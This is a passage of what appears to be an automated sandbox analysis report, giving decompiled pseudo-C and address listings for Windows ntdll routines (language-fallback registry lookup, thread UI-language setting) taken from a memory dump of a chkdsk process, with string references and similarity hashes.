                                                      0x04d97e5d
                                                      0x04d97e71
                                                      0x04d97f33
                                                      0x04d97e77
                                                      0x04d97e77
                                                      0x04d97e79
                                                      0x04d97e79
                                                      0x04d97e7e
                                                      0x04d97f45
                                                      0x04de9848
                                                      0x00000000
                                                      0x04de9848
                                                      0x04d97f4e
                                                      0x04d97f53
                                                      0x04d97f5a
                                                      0x00000000
                                                      0x00000000
                                                      0x04de985a
                                                      0x04de9862
                                                      0x04de9866
                                                      0x00000000
                                                      0x04de986c
                                                      0x00000000
                                                      0x04de986c
                                                      0x04d97e84
                                                      0x04d97e84
                                                      0x04d97e8d
                                                      0x04de9871
                                                      0x04d97eb8
                                                      0x04d97ec0
                                                      0x04d97ec0
                                                      0x04d97e9a
                                                      0x04de987e
                                                      0x00000000
                                                      0x00000000
                                                      0x04de9884
                                                      0x04de988b
                                                      0x04de98a7
                                                      0x04de98ac
                                                      0x04de98b1
                                                      0x04de98b6
                                                      0x04de98b8
                                                      0x04de98b8
                                                      0x04de98b9
                                                      0x00000000
                                                      0x04de98b9
                                                      0x04d97ea0
                                                      0x04d97ea7
                                                      0x00000000
                                                      0x00000000
                                                      0x04d97eac
                                                      0x04d97eb1
                                                      0x04d97ec6
                                                      0x04d97ed0
                                                      0x04de98cc
                                                      0x04d97ed6
                                                      0x04d97ed6
                                                      0x04d97ed6
                                                      0x04d97ede
                                                      0x04d97ee3
                                                      0x04de98e3
                                                      0x04de98f0
                                                      0x04de9902
                                                      0x04de98f2
                                                      0x04de98fb
                                                      0x04de98fb
                                                      0x04de9907
                                                      0x04de991d
                                                      0x04de991d
                                                      0x04de9907
                                                      0x04de98e3
                                                      0x04d97ef0
                                                      0x04d97f14
                                                      0x04d97f14
                                                      0x04d97f1e
                                                      0x04de9946
                                                      0x04d97f24
                                                      0x04d97f24
                                                      0x04d97f24
                                                      0x04d97f2c
                                                      0x04de996a
                                                      0x04de9975
                                                      0x04de9975
                                                      0x04de997e
                                                      0x04de9993
                                                      0x04de9993
                                                      0x04de997e
                                                      0x00000000
                                                      0x04d97ef2
                                                      0x04d97efc
                                                      0x04d97f0a
                                                      0x04d97f0e
                                                      0x04de9933
                                                      0x00000000
                                                      0x04de9933
                                                      0x00000000
                                                      0x04d97f0e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d97eb1

                                                      Strings
                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 04DE9891
                                                      • minkernel\ntdll\ldrmap.c, xrefs: 04DE98A2
                                                      • LdrpCompleteMapModule, xrefs: 04DE9898
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                      • API String ID: 0-1676968949
                                                      • Opcode ID: 9baaba34d52c022210c681e2ddf372bad302f1a7fbdcbd54991d1359e7e04a4a
                                                      • Instruction ID: 76a9c790f77af9920336ba84f064802568feafa5236f7207d322f406efff9c1c
                                                      • Opcode Fuzzy Hash: 9baaba34d52c022210c681e2ddf372bad302f1a7fbdcbd54991d1359e7e04a4a
                                                      • Instruction Fuzzy Hash: 0F51CB71A10746DBEB21DF69C994B6AB7E4FB01314F040699E991DB6E1E770FD00CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D8E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E04D8E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E04D8F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E04DC95D0();
						}
						if(_t78 != 0) {
							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E04DCFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E04DCBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04DC9600();
					if(_t97 < 0) {
						goto L6;
					}
					E04DCBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L04D8F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E04DCBB40(_t83, _t102 + 0x24, _t78);
								if(L04D943C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E04DCBB40(_t84, _t102 + 0x24, _t94);
									if(L04D943C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                      0x04d8e620
                                                      0x04d8e628
                                                      0x04d8e62f
                                                      0x04d8e631
                                                      0x04d8e635
                                                      0x04d8e637
                                                      0x04d8e63e
                                                      0x04de5503
                                                      0x04de5503
                                                      0x04d8e64c
                                                      0x04d8e64c
                                                      0x04d8e651
                                                      0x00000000
                                                      0x00000000
                                                      0x04d8e661
                                                      0x04d8e665
                                                      0x04de542a
                                                      0x04d8e715
                                                      0x04d8e71a
                                                      0x04d8e71c
                                                      0x04d8e720
                                                      0x04d8e720
                                                      0x04d8e727
                                                      0x04d8e736
                                                      0x04d8e736
                                                      0x04d8e743
                                                      0x04d8e743
                                                      0x04d8e673
                                                      0x04d8e678
                                                      0x04d8e67d
                                                      0x04d8e682
                                                      0x04d8e685
                                                      0x04d8e692
                                                      0x04d8e69b
                                                      0x04d8e6a3
                                                      0x04d8e6ad
                                                      0x04d8e6b1
                                                      0x04d8e6b2
                                                      0x04d8e6bb
                                                      0x04d8e6bf
                                                      0x04d8e6c0
                                                      0x04d8e6c8
                                                      0x04d8e6cc
                                                      0x04d8e6d5
                                                      0x04d8e6d9
                                                      0x00000000
                                                      0x00000000
                                                      0x04d8e6e5
                                                      0x04d8e6ea
                                                      0x04d8e6f9
                                                      0x04d8e70b
                                                      0x04d8e70f
                                                      0x04de5439
                                                      0x04de545e
                                                      0x04de545e
                                                      0x00000000
                                                      0x04de545e
                                                      0x04de543b
                                                      0x04de543e
                                                      0x04de5440
                                                      0x04de5445
                                                      0x04de5472
                                                      0x04de5475
                                                      0x04de548d
                                                      0x04de5493
                                                      0x04de54a9
                                                      0x00000000
                                                      0x00000000
                                                      0x04de54ab
                                                      0x04de54b4
                                                      0x04de54bc
                                                      0x04de54c8
                                                      0x04de54de
                                                      0x04de54fb
                                                      0x04de54e0
                                                      0x04de54e6
                                                      0x04de54eb
                                                      0x04de54eb
                                                      0x04de54de
                                                      0x00000000
                                                      0x04de54bc
                                                      0x04de5477
                                                      0x04de547a
                                                      0x04de5480
                                                      0x04de5483
                                                      0x04de5486
                                                      0x04de548b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04de548b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04de5447
                                                      0x04de5447
                                                      0x04de5447
                                                      0x04de5447
                                                      0x04de544e
                                                      0x00000000
                                                      0x00000000
                                                      0x04de5450
                                                      0x04de5452
                                                      0x04de5455
                                                      0x04de545a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04de545c
                                                      0x04de546a
                                                      0x04de546d
                                                      0x04de546f
                                                      0x00000000
                                                      0x04de546f
                                                      0x04d8e70f

                                                      Strings
                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04D8E68C
                                                      • InstallLanguageFallback, xrefs: 04D8E6DB
                                                      • @, xrefs: 04D8E6C0
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                      • API String ID: 0-1757540487
                                                      • Opcode ID: fea51cbdb3437f4d6c9cdbf4dd764608e5d009d6e039ff442152e2db2fc7d625
                                                      • Instruction ID: 3c3cb4ccb7c316f64b84a1a71e9ecdf768baaeeec4da7b753475d20dce8e32eb
                                                      • Opcode Fuzzy Hash: fea51cbdb3437f4d6c9cdbf4dd764608e5d009d6e039ff442152e2db2fc7d625
                                                      • Instruction Fuzzy Hash: 5D519072608356ABD710EF65D450A7BB3E8FF88758F05096EF985D7240F734EA048BA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DBFAB0 Relevance: 2.8, Strings: 2, Instructions: 306COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E04DBFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E04D9EEF0(0x4e77b60);
					_t134 =  *0x4e77b84; // 0x776f7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x4e77b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x4e77b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04D96D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E04D976E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04E28938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E04D8B150();
													}
													_t116 = E04E26D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E04D975CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x4e78638; // 0x0
																	_t122 = L04D938A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E04D976E2(_t154);
																			goto L41;
																		}
																	} else {
																		E04D976E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L04DBFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L04D970F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E04DBFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E04DBFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E04DBFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E04DBFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E04DBFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x4e77b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x4e77b84 = _t75;
						_t73 = E04D9EB70(_t134, 0x4e77b60);
						if( *0x4e77b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E04D9FF60( *0x4e77b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                      0x04dbfab0
                                                      0x04dbfab2
                                                      0x04dbfab3
                                                      0x04dbfab4
                                                      0x04dbfabc
                                                      0x04dbfac0
                                                      0x04dbfb14
                                                      0x04dbfb17
                                                      0x04dbfac2
                                                      0x04dbfac8
                                                      0x04dbfacd
                                                      0x04dbfad3
                                                      0x04dbfad3
                                                      0x04dbfadd
                                                      0x04dbfb18
                                                      0x04dbfb1b
                                                      0x04dbfb1d
                                                      0x04dbfb1e
                                                      0x04dbfb1f
                                                      0x04dbfb20
                                                      0x04dbfb21
                                                      0x04dbfb22
                                                      0x04dbfb23
                                                      0x04dbfb24
                                                      0x04dbfb25
                                                      0x04dbfb26
                                                      0x04dbfb27
                                                      0x04dbfb28
                                                      0x04dbfb29
                                                      0x04dbfb2a
                                                      0x04dbfb2b
                                                      0x04dbfb2c
                                                      0x04dbfb2d
                                                      0x04dbfb2e
                                                      0x04dbfb2f
                                                      0x04dbfb3a
                                                      0x04dbfb3b
                                                      0x04dbfb3e
                                                      0x04dbfb41
                                                      0x04dbfb44
                                                      0x04dbfb47
                                                      0x04dbfb4a
                                                      0x04dbfb4d
                                                      0x04dbfb53
                                                      0x04dfbdcb
                                                      0x04dfbdcb
                                                      0x04dbfb59
                                                      0x04dbfb5b
                                                      0x04dbfb5b
                                                      0x04dbfb5e
                                                      0x04dfbdd5
                                                      0x04dfbdd8
                                                      0x00000000
                                                      0x04dfbdda
                                                      0x00000000
                                                      0x04dfbdda
                                                      0x04dbfb64
                                                      0x04dbfb64
                                                      0x04dbfb64
                                                      0x04dbfb67
                                                      0x04dbfb6e
                                                      0x04dbfb70
                                                      0x04dbfb72
                                                      0x00000000
                                                      0x04dbfb78
                                                      0x04dbfb7a
                                                      0x04dbfb7a
                                                      0x04dbfb7d
                                                      0x04dbfb80
                                                      0x04dfbddf
                                                      0x04dfbde1
                                                      0x00000000
                                                      0x04dfbde3
                                                      0x00000000
                                                      0x04dfbde3
                                                      0x04dbfb86
                                                      0x04dbfb86
                                                      0x04dbfb86
                                                      0x04dbfb8b
                                                      0x04dbfb90
                                                      0x04dbfb92
                                                      0x04dbfb94
                                                      0x04dbfb9a
                                                      0x04dbfb9b
                                                      0x04dbfba1
                                                      0x04dfbde8
                                                      0x04dfbdeb
                                                      0x04dfbded
                                                      0x04dfbeb5
                                                      0x04dfbeb5
                                                      0x04dfbebb
                                                      0x04dfbebd
                                                      0x04dfbec3
                                                      0x04dfbed2
                                                      0x04dfbedd
                                                      0x04dfbedd
                                                      0x04dfbeed
                                                      0x00000000
                                                      0x04dfbdf3
                                                      0x04dfbdfe
                                                      0x04dfbe06
                                                      0x04dfbe0b
                                                      0x04dfbe0d
                                                      0x04dfbe0f
                                                      0x04dfbe14
                                                      0x04dfbe19
                                                      0x04dfbe20
                                                      0x04dfbe25
                                                      0x04dfbe27
                                                      0x04dfbe35
                                                      0x04dfbe39
                                                      0x04dfbe46
                                                      0x04dfbe4f
                                                      0x04dfbe54
                                                      0x04dfbe56
                                                      0x04dfbef8
                                                      0x04dfbef8
                                                      0x00000000
                                                      0x04dfbe5c
                                                      0x04dfbe5c
                                                      0x04dfbe60
                                                      0x00000000
                                                      0x04dfbe66
                                                      0x04dfbe66
                                                      0x04dfbe7f
                                                      0x04dfbe84
                                                      0x04dfbe87
                                                      0x04dfbe89
                                                      0x04dfbe8b
                                                      0x04dfbe99
                                                      0x04dfbe9d
                                                      0x04dfbea0
                                                      0x04dfbeac
                                                      0x04dfbeaf
                                                      0x04dfbeb1
                                                      0x04dfbeb3
                                                      0x04dfbeb3
                                                      0x00000000
                                                      0x04dfbea2
                                                      0x04dfbea2
                                                      0x00000000
                                                      0x04dfbea2
                                                      0x04dfbe8d
                                                      0x04dfbe8d
                                                      0x04dfbe92
                                                      0x00000000
                                                      0x04dfbe92
                                                      0x04dfbe8b
                                                      0x04dfbe60
                                                      0x04dfbe3b
                                                      0x04dfbe3b
                                                      0x04dfbe3e
                                                      0x00000000
                                                      0x04dfbe40
                                                      0x04dfbe40
                                                      0x04dfbe44
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04dfbe44
                                                      0x04dfbe3e
                                                      0x04dfbe29
                                                      0x04dfbe29
                                                      0x00000000
                                                      0x04dfbe29
                                                      0x04dfbe27
                                                      0x00000000
                                                      0x04dbfba7
                                                      0x04dbfba7
                                                      0x04dbfbab
                                                      0x04dfbf02
                                                      0x04dbfbb1
                                                      0x04dbfbb1
                                                      0x04dbfbb8
                                                      0x04dbfbbd
                                                      0x04dbfbbd
                                                      0x04dbfbbf
                                                      0x04dbfbbf
                                                      0x04dbfbc5
                                                      0x04dbfbcb
                                                      0x04dbfbf8
                                                      0x04dbfbf8
                                                      0x04dbfbfa
                                                      0x00000000
                                                      0x04dbfc00
                                                      0x04dbfc00
                                                      0x04dbfc03
                                                      0x00000000
                                                      0x04dbfc09
                                                      0x04dbfc09
                                                      0x04dbfc0f
                                                      0x04dbfc15
                                                      0x04dbfc23
                                                      0x04dbfc23
                                                      0x04dbfc25
                                                      0x04dbfc27
                                                      0x04dbfc75
                                                      0x04dbfc7c
                                                      0x04dbfc84
                                                      0x00000000
                                                      0x04dbfc29
                                                      0x04dbfc29
                                                      0x04dbfc2d
                                                      0x04dbfc30
                                                      0x04dfbf0f
                                                      0x00000000
                                                      0x04dbfc36
                                                      0x04dbfc38
                                                      0x04dbfc3b
                                                      0x04dbfc41
                                                      0x04dfbf17
                                                      0x04dfbf19
                                                      0x04dfbf48
                                                      0x04dfbf4b
                                                      0x00000000
                                                      0x04dfbf1b
                                                      0x04dfbf22
                                                      0x04dfbf24
                                                      0x04dfbf26
                                                      0x00000000
                                                      0x04dfbf2c
                                                      0x04dfbf37
                                                      0x04dfbf39
                                                      0x04dfbf3b
                                                      0x00000000
                                                      0x04dfbf41
                                                      0x04dfbf41
                                                      0x04dfbf41
                                                      0x04dfbf41
                                                      0x04dfbf45
                                                      0x00000000
                                                      0x04dfbf45
                                                      0x04dfbf3b
                                                      0x04dfbf26
                                                      0x00000000
                                                      0x04dbfc47
                                                      0x04dbfc47
                                                      0x04dbfc49
                                                      0x04dbfcb2
                                                      0x04dbfcb4
                                                      0x04dbfcb6
                                                      0x04dbfcdc
                                                      0x04dbfcdc
                                                      0x00000000
                                                      0x04dbfcb8
                                                      0x04dbfcc3
                                                      0x04dbfcc5
                                                      0x04dbfcc7
                                                      0x00000000
                                                      0x04dbfcc9
                                                      0x04dbfcc9
                                                      0x04dbfccd
                                                      0x00000000
                                                      0x04dbfccd
                                                      0x04dbfcc7
                                                      0x00000000
                                                      0x04dbfc4b
                                                      0x04dbfc4b
                                                      0x04dbfc4e
                                                      0x04dbfc4e
                                                      0x04dbfc51
                                                      0x04dbfc51
                                                      0x04dbfc54
                                                      0x04dbfc5a
                                                      0x04dbfc5c
                                                      0x04dbfc5f
                                                      0x04dbfc61
                                                      0x04dbfc63
                                                      0x04dbfc65
                                                      0x04dbfc67
                                                      0x04dbfc6e
                                                      0x04dbfc72
                                                      0x04dbfc72
                                                      0x04dbfc72
                                                      0x04dbfc72
                                                      0x04dbfc67
                                                      0x04dbfc61
                                                      0x00000000
                                                      0x04dbfc5a
                                                      0x04dbfc49
                                                      0x04dbfc41
                                                      0x04dbfc30
                                                      0x04dbfc27
                                                      0x04dbfc03
                                                      0x04dbfbcd
                                                      0x04dbfbd3
                                                      0x04dbfbd9
                                                      0x04dbfbdc
                                                      0x04dbfbde
                                                      0x04dbfc99
                                                      0x04dbfc9b
                                                      0x04dbfc9d
                                                      0x04dbfcd5
                                                      0x04dbfcd5
                                                      0x04dbfc89
                                                      0x04dbfc89
                                                      0x00000000
                                                      0x04dbfc9f
                                                      0x04dbfc9f
                                                      0x04dbfca3
                                                      0x00000000
                                                      0x04dbfca3
                                                      0x00000000
                                                      0x04dbfbe4
                                                      0x04dbfbe4
                                                      0x04dbfbe4
                                                      0x04dbfbe4
                                                      0x04dbfbe9
                                                      0x04dbfbf2
                                                      0x00000000
                                                      0x04dbfbf2
                                                      0x04dbfbde
                                                      0x04dbfbcb
                                                      0x04dbfbab
                                                      0x04dbfc8b
                                                      0x04dbfc8b
                                                      0x04dbfc8c
                                                      0x04dbfb80
                                                      0x04dbfb72
                                                      0x04dbfb5e
                                                      0x04dbfc8d
                                                      0x04dbfc91
                                                      0x04dbfadf
                                                      0x04dbfadf
                                                      0x04dbfae1
                                                      0x04dbfae4
                                                      0x04dbfae7
                                                      0x04dbfaec
                                                      0x04dbfaf8
                                                      0x04dbfb00
                                                      0x04dbfb07
                                                      0x04dbfb0f
                                                      0x04dbfb0f
                                                      0x04dbfb07
                                                      0x00000000
                                                      0x04dbfaf8
                                                      0x04dbfadd

                                                      Strings
                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 04DFBE0F
                                                      • (10, xrefs: 04DBFAF1
                                                      Memory Dump Source
